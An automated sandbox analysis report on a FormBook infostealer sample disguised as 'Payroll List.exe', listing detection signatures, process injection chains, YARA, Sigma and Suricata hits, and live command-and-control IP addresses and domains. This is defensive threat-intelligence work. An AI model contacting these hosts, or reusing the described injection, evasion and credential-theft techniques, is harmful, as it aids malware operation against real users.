Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payroll List.exe

Overview

General Information

Sample name:Payroll List.exe
Analysis ID:1560911
MD5:f15d8b7a5271a52273a158ff2f642d12
SHA1:9a6178bbf1f646d6d29d6b9cfb7cfdd415f6458a
SHA256:9de22b2b1f7bf1727126b7d85573f62bc9c247075936ced5cf1035bc893d48d7
Tags:exeuser-julianmckein
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Payroll List.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\Payroll List.exe" MD5: F15D8B7A5271A52273A158FF2F642D12)
    • svchost.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Payroll List.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eLiCpwzRIeWAs.exe (PID: 5964 cmdline: "C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 7988 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 7996 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • eLiCpwzRIeWAs.exe (PID: 1240 cmdline: "C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7372 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payroll List.exe", CommandLine: "C:\Users\user\Desktop\Payroll List.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ParentImage: C:\Users\user\Desktop\Payroll List.exe, ParentProcessId: 7720, ParentProcessName: Payroll List.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ProcessId: 7784, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Payroll List.exe", CommandLine: "C:\Users\user\Desktop\Payroll List.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ParentImage: C:\Users\user\Desktop\Payroll List.exe, ParentProcessId: 7720, ParentProcessName: Payroll List.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ProcessId: 7784, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T14:44:49.867696+010020507451Malware Command and Control Activity Detected192.168.2.849707154.216.76.8080TCP
                2024-11-22T14:45:15.054578+010020507451Malware Command and Control Activity Detected192.168.2.8497123.33.130.19080TCP
                2024-11-22T14:45:30.073486+010020507451Malware Command and Control Activity Detected192.168.2.849716203.161.49.19380TCP
                2024-11-22T14:45:44.801631+010020507451Malware Command and Control Activity Detected192.168.2.8497203.33.130.19080TCP
                2024-11-22T14:45:59.907703+010020507451Malware Command and Control Activity Detected192.168.2.8497243.33.130.19080TCP
                2024-11-22T14:46:14.898190+010020507451Malware Command and Control Activity Detected192.168.2.849728198.252.98.5480TCP
                2024-11-22T14:46:30.465806+010020507451Malware Command and Control Activity Detected192.168.2.849732103.224.182.24280TCP
                2024-11-22T14:46:46.133779+010020507451Malware Command and Control Activity Detected192.168.2.849736154.23.184.21880TCP
                2024-11-22T14:47:01.304688+010020507451Malware Command and Control Activity Detected192.168.2.84974031.31.196.1780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T14:44:49.867696+010028554651A Network Trojan was detected192.168.2.849707154.216.76.8080TCP
                2024-11-22T14:45:15.054578+010028554651A Network Trojan was detected192.168.2.8497123.33.130.19080TCP
                2024-11-22T14:45:30.073486+010028554651A Network Trojan was detected192.168.2.849716203.161.49.19380TCP
                2024-11-22T14:45:44.801631+010028554651A Network Trojan was detected192.168.2.8497203.33.130.19080TCP
                2024-11-22T14:45:59.907703+010028554651A Network Trojan was detected192.168.2.8497243.33.130.19080TCP
                2024-11-22T14:46:14.898190+010028554651A Network Trojan was detected192.168.2.849728198.252.98.5480TCP
                2024-11-22T14:46:30.465806+010028554651A Network Trojan was detected192.168.2.849732103.224.182.24280TCP
                2024-11-22T14:46:46.133779+010028554651A Network Trojan was detected192.168.2.849736154.23.184.21880TCP
                2024-11-22T14:47:01.304688+010028554651A Network Trojan was detected192.168.2.84974031.31.196.1780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T14:45:07.003448+010028554641A Network Trojan was detected192.168.2.8497093.33.130.19080TCP
                2024-11-22T14:45:09.629527+010028554641A Network Trojan was detected192.168.2.8497103.33.130.19080TCP
                2024-11-22T14:45:12.273605+010028554641A Network Trojan was detected192.168.2.8497113.33.130.19080TCP
                2024-11-22T14:45:21.988359+010028554641A Network Trojan was detected192.168.2.849713203.161.49.19380TCP
                2024-11-22T14:45:24.696464+010028554641A Network Trojan was detected192.168.2.849714203.161.49.19380TCP
                2024-11-22T14:45:27.401707+010028554641A Network Trojan was detected192.168.2.849715203.161.49.19380TCP
                2024-11-22T14:45:36.965532+010028554641A Network Trojan was detected192.168.2.8497173.33.130.19080TCP
                2024-11-22T14:45:39.557692+010028554641A Network Trojan was detected192.168.2.8497183.33.130.19080TCP
                2024-11-22T14:45:42.145120+010028554641A Network Trojan was detected192.168.2.8497193.33.130.19080TCP
                2024-11-22T14:45:51.749224+010028554641A Network Trojan was detected192.168.2.8497213.33.130.19080TCP
                2024-11-22T14:45:54.510679+010028554641A Network Trojan was detected192.168.2.8497223.33.130.19080TCP
                2024-11-22T14:45:57.209645+010028554641A Network Trojan was detected192.168.2.8497233.33.130.19080TCP
                2024-11-22T14:46:06.938463+010028554641A Network Trojan was detected192.168.2.849725198.252.98.5480TCP
                2024-11-22T14:46:09.548475+010028554641A Network Trojan was detected192.168.2.849726198.252.98.5480TCP
                2024-11-22T14:46:12.157215+010028554641A Network Trojan was detected192.168.2.849727198.252.98.5480TCP
                2024-11-22T14:46:22.583498+010028554641A Network Trojan was detected192.168.2.849729103.224.182.24280TCP
                2024-11-22T14:46:25.163977+010028554641A Network Trojan was detected192.168.2.849730103.224.182.24280TCP
                2024-11-22T14:46:27.865598+010028554641A Network Trojan was detected192.168.2.849731103.224.182.24280TCP
                2024-11-22T14:46:38.032785+010028554641A Network Trojan was detected192.168.2.849733154.23.184.21880TCP
                2024-11-22T14:46:40.704853+010028554641A Network Trojan was detected192.168.2.849734154.23.184.21880TCP
                2024-11-22T14:46:43.360922+010028554641A Network Trojan was detected192.168.2.849735154.23.184.21880TCP
                2024-11-22T14:46:53.207473+010028554641A Network Trojan was detected192.168.2.84973731.31.196.1780TCP
                2024-11-22T14:46:55.800508+010028554641A Network Trojan was detected192.168.2.84973831.31.196.1780TCP
                2024-11-22T14:46:58.697237+010028554641A Network Trojan was detected192.168.2.84973931.31.196.1780TCP
                2024-11-22T14:47:08.567712+010028554641A Network Trojan was detected192.168.2.84974164.190.63.22280TCP
                2024-11-22T14:47:11.826466+010028554641A Network Trojan was detected192.168.2.84974264.190.63.22280TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Payroll List.exeReversingLabs: Detection: 57%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Payroll List.exeJoe Sandbox ML: detected
                Source: Payroll List.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656145013.000000000061E000.00000002.00000001.01000000.00000005.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3291434953.000000000061E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00166CA9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001660DD
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001663F9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0016EB60
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F56F FindFirstFileW,FindClose,0_2_0016F56F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0016F5FA
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171B2F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171C8A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00171F94
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0041C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0041C810
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax6_2_00409F20
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then pop edi6_2_0040E50B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h6_2_02A404DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49709 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49712 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49707 -> 154.216.76.80:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49707 -> 154.216.76.80:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49720 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49720 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49710 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49724 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49724 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49728 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49732 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49732 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49728 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 64.190.63.222:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 64.190.63.222:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49736 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49736 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49740 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49740 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 198.252.98.54:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.huiguang.xyz
                Source: DNS query: www.schedulemassage.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewIP Address: 31.31.196.17 31.31.196.17
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00174EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00174EB5
